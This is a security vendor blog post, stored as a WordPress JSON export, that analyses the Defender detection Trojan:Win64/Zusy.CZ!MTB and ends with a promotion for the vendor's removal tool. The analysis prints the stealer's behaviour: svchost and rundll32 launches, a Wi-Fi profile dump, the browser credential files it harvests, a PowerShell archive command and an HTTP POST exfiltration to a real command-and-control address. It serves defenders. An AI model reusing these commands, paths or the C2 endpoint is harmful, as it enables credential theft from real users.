{"id":27505,"date":"2024-10-06T21:53:30","date_gmt":"2024-10-06T21:53:30","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=27505"},"modified":"2024-10-06T21:53:30","modified_gmt":"2024-10-06T21:53:30","slug":"trojan-win64-zusy-czmtb-virus-remove","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/trojan-win64-zusy-czmtb-virus-remove\/","title":{"rendered":"Trojan:Win64\/Zusy.CZ!MTB"},"content":{"rendered":"<p><strong>Trojan:Win64\/Zusy.CZ!MTB is a detection of Microsoft Defender<\/strong> that can flag several different types of malware. Being a heuristic detection, it can as well be a false positive, with no real threat to the system. Let me explain in detail what this threat is about, and how to remove it.<\/p>\n<h2>Trojan:Win64\/Zusy.CZ!MTB Overview<\/h2>\n<p>Trojan:Win64\/Zusy.CZ!MTB is <a href=\"https:\/\/gridinsoft.com\/blogs\/heuristic-virus\/\">a Microsoft Defender heuristic detection<\/a> that is categorized as an info stealer or spyware. Although the detection name includes &#8220;Zusy&#8221;, it is unlikely that this threat is directly related to the Zusy, aka Tinba (Tiny Banker) banking trojan. Instead, this is <strong>more about similarities in behavior<\/strong>, rather than the specific threat.<\/p>\n<figure id=\"attachment_27512\" aria-describedby=\"caption-attachment-27512\" style=\"width: 468px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/10\/Win64Zusy.CZMTB_.webp\" alt=\"Win64\/Zusy.CZ!MTB Detection screenshot\" width=\"468\" height=\"291\" class=\"size-full wp-image-27512\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/10\/Win64Zusy.CZMTB_.webp 468w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/10\/Win64Zusy.CZMTB_-300x187.webp 300w\" sizes=\"auto, (max-width: 468px) 100vw, 468px\" \/><figcaption id=\"caption-attachment-27512\" class=\"wp-caption-text\">Win64\/Zusy.CZ!MTB Detection<\/figcaption><\/figure>\n<p>Typically, malware detected with this name steals sensitive data from the system, messengers, and browsers. In addition to these functions, some samples of Zusy.CZ!MTB can act <a href=\"https:\/\/gridinsoft.com\/dropper\/amadey\">as a malware dropper<\/a>. It can dynamically load necessary modules, enabling it to load essential Windows functions (e.g., API functions) directly at code execution, bypassing static binding at the compilation stage. In simple words \u2013 it can circumvent security mechanisms and run malware without any obstacles.<\/p>\n<h2>Technical Analysis<\/h2>\n<p>Let&#8217;s take a closer look at how Trojan:Win64\/Zusy.CZ!MTB behaves on the system. The first action the malware takes is to <strong>check for any existing copies<\/strong> running on the system. To achieve this, it searches for and reads several mutexes. If no other copies are found, the malware creates the following mutex:<\/p>\n<p><code style=\"font-size: 14px\">Global\\SyncRootManager<br \/>\nLocal\\ZonesCacheCounterMutex<br \/>\nLocal\\ZonesLockedCacheCounterMutex<br \/>\ncversions.3.m<\/code><\/p>\n<p>Further, it creates a selection of processes using calls to SVCHost, a legit Windows system process. That way, malware provides itself with high privileges, and also manages to go below the radar of security systems.<\/p>\n<p><code style=\"font-size: 14px\">%windir%\\System32\\svchost.exe -k WerSvcGroup<br \/>\n%CONHOST% \"745317126-1829192619145923398189172921-1227097410-10282899566139682-372746664<br \/>\n%CONHOST% \"-1075281491-1761242975-14846433691718005387762123978-115817497120033444571637710908<\/code><\/p>\n<p>After loading what looks like some of its modules, Trojan:Win64\/Zusy.CZ!MTB proceeds with checking the system for being <strong>a virtualized environment<\/strong> of any sort. That is a rather typical check for almost any malware sample these days, and it will cease any further execution shall the system have any signs of artificiality.<\/p>\n<p><code style=\"font-size: 14px\">HKEY_CURRENT_USER\\Software\\Microsoft\\Installer\\Assemblies\\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe.Config<br \/>\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config<br \/>\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options<br \/>\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion<\/code><\/p>\n<p>Preparation steps continue with checks of security software. With the call to <strong>services.exe<\/strong> the virus enumerates active services, seeking for ones that are specific to antivirus software. It will alter its behavior if one or several matches are present. Further checks review the configurations of Microsoft Defender.<\/p>\n<p><code style=\"font-size: 14px\">C:\\Windows\\system32\\services.exe<br \/>\nC:\\Windows\\system32\\SecurityHealthService.exe<br \/>\nC:\\Program Files\\Windows Defender\\MpClient.dll<br \/>\nC:\\Program Files\\Windows Defender\\MpOAV.dll<br \/>\nC:\\Program Files\\Windows Defender\\MsMpLics.dll<\/code><\/p>\n<h3>Gathering System Information and Establishing Persistence<\/h3>\n<p>The next step involves creating a system fingerprint and collecting basic information. That is not yet about stealing personal information: malware needs just <strong>basic stats of the system<\/strong> for the command server to distinguish it from others. To do this, the malware launches several other processes:<\/p>\n<p><code style=\"font-size: 14px\">wmiadap.exe \/F \/T \/R<br \/>\n%windir%\\system32\\wbem\\wmiprvse.exe<br \/>\nC:\\Windows\\System32\\netsh.exe netsh wlan show profiles<\/code><\/p>\n<p>While these are legitimate Windows tools, the malware employs them to forcibly update system information.<\/p>\n<p>To gain additional persistence, malware edits a selection of registry keys, mainly responsible for networking and program properties. Specifically, the malware installs a proxy server to control traffic on the target system and sets the value to 1 (enabled), indicating its ability to control the Internet connection. The reason for the edits to InstalledWin32AppsRevision key are not clear, but it may serve to track changes in program configurations.<\/p>\n<p><code style=\"font-size: 14px\">HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Search\\InstalledWin32AppsRevision<br \/>\nHKEY_USERS\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable<br \/>\nHKEY_USERS\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer<\/code><\/p>\n<h3>C2 Connection<\/h3>\n<p>After gathering the system fingerprint, the malware contacts <a href=\"https:\/\/gridinsoft.com\/command-and-control\">the command and control server<\/a> at <strong>185.215.113.32\/yandex\/index.php<\/strong>, transmits the collected information, and awaits further instructions. Typically for the majority of samples, those instructions consist of what files and data should the virus search for.<\/p>\n<h3>Collecting sensitive data<\/h3>\n<p>Upon receiving the configuration file, Trojan:Win64\/Zusy.CZ!MTB starts its main course of action: <strong>collecting sensitive data<\/strong>. To achieve this, it exploits rundll32.exe, a legitimate process to run the following command from a temporary folder:<\/p>\n<p><code style=\"font-size: 14px\">\"C:\\Windows\\System32\\rundll32.exe\" C:\\Users\\A4148~1.MON\\AppData\\Local\\Temp\\d6feff0c199f425b6ae4ebf34630939d.exe.dll,DllMain<br \/>\nkernel32.CreateSemaphoreW<\/code><\/p>\n<p>Following this, it goes through folders that contain browser data, particularly going for things that can carry information about user accounts, login credentials and so on. Alongside browser data, the malware also collects user information from several Windows folders.<\/p>\n<p><code style=\"font-size: 14px\">C:\\Program Files (x86)\\Google\\GoogleUpdater\\130.0.6679.0\\.purple\\accounts.xml<br \/>\nC:\\Program Files\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml<br \/>\nC:\\Program Files\\Internet Explorer\\.purple\\accounts.xml<br \/>\nC:\\Program Files\\Mozilla Firefox\\.purple\\accounts.xml<br \/>\nC:\\Program Files\\Mozilla Firefox\\TorBrowser\\Data\\Browser\\profile.default<br \/>\nC:\\Program Files\\Mozilla Thunderbird\\Thunderbird.exe<br \/>\nC:\\Users\\<USER>\\AppData\\Local\\Tor Browser\\Browser\\TorBrowser\\Data\\Browser\\profile.default\\logins.json<br \/>\nC:\\Users\\<USER>\\AppData\\Local\\CentBrowser\\User Data\\Default\\Login Data<br \/>\nC:\\Users\\<USER>\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data<br \/>\nC:\\Users\\<USER>\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data-journal<br \/>\nC:\\Users\\<USER>\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data-wal<br \/>\nC:\\Users\\<USER>\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data<br \/>\nC:\\Users\\<USER>\\AppData\\Roaming\\.purple\\accounts.xml<br \/>\nC:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\.purple\\accounts.xml<\/code><\/p>\n<h3>Data Exfiltration<\/h3>\n<p>Once the malware completes the data collection, it compresses the information into an archive saved in a temporary folder, using a corresponding PowerShell command:<\/p>\n<p><code style=\"font-size: 14px\">powershell -Command Compress-Archive -Path '%TEMP%\\_Files_\\' -DestinationPath '%TEMP%\\758232323065_Desktop.zip' -CompressionLevel Optimal<br \/>\n rundll32.exe %SAMPLEPATH%,Save<\/code><\/p>\n<p>The final step involves uploading the archive to the attacker&#8217;s server. As the malware uses HTTP connection for this, it could have been possible to intercept the package and discover that the malware attack is going on. However, the previous step of compressing the files into an archive makes it a much more complicated endeavor.<\/p>\n<p><code style=\"font-size: 14px\">POST http:\/\/185.215.113.32\/yandex\/index.php 200<\/code><\/p>\n<h2>Can Trojan:Win64\/Zusy.CZ!MTB be a false positive?<\/h2>\n<p>Yes, Trojan:Win64\/Zusy.CZ!MTB can indeed be a false positive. For instance, <a href=\"https:\/\/www.reddit.com\/r\/techsupport\/comments\/1f38f0z\/trojanwin64zusyczmtb_am_i_safe_now\/\" rel=\"noopener noreferrer nofollow\" target=\"_blank\">some Reddit users reported<\/a> that Defender unexpectedly detected Zusy trojan upon starting their PCs, particularly in some non-threatening log files. At times, this detection was linked to outdated Chromium files. It is also possible to see this detection flagging own-made programs, especially if they have certain networking capabilities.<\/p>\n<p>Given that this is a heuristic detection, such occurrences are not surprising. <strong>Updating either detection databases<\/strong> of Microsoft Defender should be enough in that case; when Chromium is detected, a browser update should fix the issue. The rest of the cases, well, they can continue for quite some time, unless you report the false positive to Microsoft themselves. But it is worth noting that figuring out whether the detection is false on your own is not always a good idea.<\/p>\n<h2>How To Remove Trojan:Win64\/Zusy.CZ!MTB?<\/h2>\n<p>If you encounter Trojan:Win64\/Zusy.CZ!MTB and suspect it is not a false positive, it\u2019s advisable to conduct a full system scan. For this, it is best to use an advanced anti-malware software such as GridinSoft Anti-Malware. Just follow the instructions below to clean your system from Trojan:Win64\/Zusy.CZ!MTB and other potential threats from your system.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp\" alt=\"GridinSoft Anti-Malware main screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22665\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.<\/p>\n<div style=\"text-align:center\"><a href=\"\/download\/antimalware\" class=\"btn border-black\" rel=\"nofollow\">Download Anti-Malware<\/a><\/div>\n<p>After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click \"Advanced mode\" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp\" alt=\"Scan results screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22666\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Click \"Clean Now\" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp\" alt=\"Removal finished\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22667\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n","protected":false},"excerpt":{"rendered":"<p>Trojan:Win64\/Zusy.CZ!MTB is a detection of Microsoft Defender that can flag several different types of malware. Being a heuristic detection, it can as well be a false positive, with no real threat to the system. Let me explain in detail what this threat is about, and how to remove it. Trojan:Win64\/Zusy.CZ!MTB Overview Trojan:Win64\/Zusy.CZ!MTB is a Microsoft [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":27516,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17,4],"tags":[48,24,223],"class_list":{"0":"post-27505","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"category-tips-tricks","9":"tag-spyware","10":"tag-trojan","11":"tag-windows-defender"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/10\/Trojan-Win64Zusy.CZMTB_.webp","author_info":{"display_name":"Stephanie Adlam","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/adlam\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27505","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=27505"}],"version-history":[{"count":9,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27505\/revisions"}],"predecessor-version":[{"id":27518,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27505\/revisions\/27518"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/27516"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=27505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=27505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=27505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}